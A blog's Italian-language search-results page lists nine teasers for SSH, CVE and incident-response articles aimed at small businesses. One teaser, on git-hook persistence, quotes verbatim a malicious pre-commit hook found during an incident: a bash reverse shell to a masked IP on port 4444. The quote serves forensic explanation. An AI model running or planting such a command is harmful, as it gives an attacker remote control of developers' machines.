Ricerca

Risultati per "bastion"

9 risultati dal blog · 0.4289 ms

Articoli dal blog

Trovati 9 risultati

  1. SSH tunneling e port forwarding per sviluppatori: accesso sicuro a database e servizi interni

    Tecniche di SSH tunneling e port forwarding per sviluppatori PHP: accesso sicuro a database remoti, RDP tunnel, SOCKS proxy e casi d'uso pratici per team

    Il 21 giugno 2025 mi ha contattato il CTO di una startup torinese nel settore analytics B2B per piattaforme e-commerce - 8 sviluppatori, 14 clienti enterprise paganti, piattaforma Laravel su un cluster Hetzner di 6 server. Il problema era insolito: i suoi sviluppatori senior si lamentavano da settimane di perdere troppo tempo in operazioni di debug quotidiano. La causa specifica era che per verificare lo stato del database MySQL di produzione, o per ispezionare una chiave Redis, o per investigar... continua a leggere

  2. SSH hardening avanzato: proteggere l'accesso ai VPS oltre le best practice di base

    SSH hardening avanzato su VPS Linux: certificati SSH invece di chiavi, port knocking, 2FA con TOTP, banner e monitoraggio tentativi di accesso per PMI.

    Il 14 maggio 2025 mi ha chiamato il responsabile IT di un gruppo veneto del settore logistica integrata per la ristorazione - 94 dipendenti distribuiti fra sede centrale di Treviso e tre magazzini regionali, circa 13 milioni di euro di fatturato annuo, un parco di 18 server Linux in produzione fra Hetzner Falkenstein e un piccolo data center privato. La chiamata arrivava tre giorni dopo la scoperta di un'intrusione: uno degli sviluppatori esterni dell'azienda aveva lasciato sei mesi prima senza ... continua a leggere

  3. regreSSHion (CVE-2024-6387) un anno e mezzo dopo: anatomia tecnica, lezioni dalla patching delle PMI e hardening SSH che applico oggi

    regreSSHion (CVE-2024-6387) un anno e mezzo dopo: anatomia del race in SIGALRM, perché il bug è tornato dopo 18 anni, e l'hardening SSH che applico ai clienti PMI nel 2026.

    La sera del 1 luglio 2024, alle 19:47 ora italiana, ho ricevuto contemporaneamente quattro alert da clienti diversi sullo stesso topic. Il post di disclosure di Qualys su regreSSHion era appena uscito: una RCE pre-auth in OpenSSH server, CVSS 9.8 come da entry NIST NVD, affecting tutte le versioni portable da 8.5p1 a 9.7p1, ovvero la quasi totalità dei sistemi Linux moderni. Quella sera ho passato sei ore al telefono e in SSH a coordinare la patching di emergenza su circa 200 server in pr... continua a leggere

  4. Architettura cybersecurity per PMI: cinque principi che spiego a ogni nuovo cliente (e uno che uccide chi ci crede)

    Defense in depth, least privilege, separation of duties, secure by design, KISS: cinque principi di sicurezza e gli errori che vedo negli audit alle PMI italiane.

    Nel settembre 2024 ho audited un e-commerce B2B veneto che aveva subito una compromissione: un attaccante era entrato via un WordPress marketing satellite (non il core Laravel dell'e-commerce) e si era mosso lateralmente fino al MySQL dell'e-commerce, esfiltrando circa 12.000 record cliente. Quando ho presentato il report all'IT manager, la sua prima frase è stata: "Ma avevamo il firewall, l'antivirus, le password complesse, e il database era separato". Aveva ragione sulla carta. Nella re... continua a leggere

  5. Hetzner: il miglior provider di Cloud VPS europeo nel 2026

    Hetzner Cloud nel 2026: pricing CX22 da €3,79, 6 datacenter, 20 TB traffico EU, GDPR DPA gratuito. Codice sconto €20 per nuovi clienti.

    Ogni sviluppatore full-stack, ogni amministratore di sistema, ogni consulente che gestisce infrastrutture cloud per clienti italiani arriva prima o poi al momento di scegliere il provider VPS principale del proprio stack operativo. Nei miei vent'anni di esperienza nel mondo delle tecnologie web ho provato la quasi totalità dei player rilevanti (Serverplan, OVH, DigitalOcean, Aruba, Contabo, Linode, Vultr), e dal 2017 il mio pellegrinaggio si è fermato definitivamente: ho scoperto H... continua a leggere

  6. CVE-2025-32433 nell'SSH di Erlang/OTP: anatomia di un pre-auth RCE "logico", LLM come aiuto all'exploit e dove nascondi Erlang senza saperlo

    CVE-2025-32433 in Erlang/OTP SSH: pre-auth RCE per logica, PoC scritto con LLM, mappa dei componenti Erlang nascosti in produzione PMI (RabbitMQ, CouchDB, ejabberd).

    Il 16 aprile 2025, mentre il mondo della cybersecurity era ancora distratto dalla crisi MITRE del giorno precedente - il finanziamento del programma CVE stava scadendo e CISA aveva appena annunciato l'estensione d'emergenza - è uscita in sordina CVE-2025-32433 sul NIST NVD: un pre-authentication RCE nel server SSH di Erlang/OTP, CVSS 10.0, scoperta dai ricercatori del Ruhr University Bochum, gli stessi che l'anno prima avevano firmato Terrapin. Ho letto il post sulla mailing list alle 10 ... continua a leggere

  7. Git hooks, alias e CVE-2024-32002: come la macchina di sviluppo diventa il vettore di persistenza più sottovalutato in una PMI

    Git hooks, alias e CVE-2024-32002 (clone con submodule che esegue codice): tre vettori di persistenza sulla macchina dello sviluppatore. Cosa controllare nelle PMI italiane.

    A maggio 2024 ho ricevuto una segnalazione da un cliente di Treviso che gestiva un e-commerce B2B con sei sviluppatori interni. L'antivirus aziendale aveva rilevato una connessione TCP in uscita verso un IP brasiliano dalla workstation del lead developer, partita esattamente nel momento in cui aveva eseguito git commit su un repository di sviluppo. Il file .git/hooks/pre-commit di quel repository conteneva 47 byte: bash -c 'bash -i >& /dev/tcp/177.X.X.X/4444 0>&1' &. L'attaccan... continua a leggere

  8. Sito PHP hackerato su Hetzner o OVH: il protocollo che applico nelle prime ore fra contenimento, forensics e ripartenza pulita

    Sito PHP defacciato o compromesso su Hetzner o OVH? Il protocollo che applico: contenimento, forensics, ripristino, hardening, notifica al Garante.

    Il 19 ottobre 2024, sabato mattina alle 9:14, ho ricevuto la chiamata di un cliente di Verona che gestiva un portale di prenotazioni B2B per il settore turistico. Il portale era ospitato su un server dedicato Hetzner AX51 ed era stato online da quattro anni senza incidenti significativi. Quel sabato mattina avevano ricevuto due segnalazioni quasi simultanee: una da un cliente che lamentava che la homepage mostrava una pagina di donazione a una causa filo-russa al posto del catalogo prodotti, e u... continua a leggere

  9. Dopo l'emergenza, il debito tecnico: come trasformo un server Linux post-subentro in un asset misurabile nei 90 giorni successivi

    Dopo subentro o incidente il debito tecnico è la vera minaccia. Il piano in 90 giorni che applico su server Hetzner e OVH per misurarlo e ripagarlo.

    Il 4 novembre 2024 ho concluso un subentro di emergenza per una PMI lombarda del settore manifatturiero che gestiva il proprio gestionale interno - preventivi, distinte base, ordini fornitori, bolle di trasporto - su un'applicazione PHP custom da 11 anni di vita, ospitata su un dedicato Hetzner AX41. L'emergenza era stata risolta in tre giorni di lavoro intenso: server compromesso, ricostruito su nuova infrastruttura, dati ripristinati da backup verificato, sito di nuovo in funzione con tutte le... continua a leggere

Potresti cercare anche
#e commerce torino #campagne google ads torino #corso bootstrap torino #esperto adwords torino #hosting torino #realizzazione siti web torino #corso php torino #realizzazione landing page torino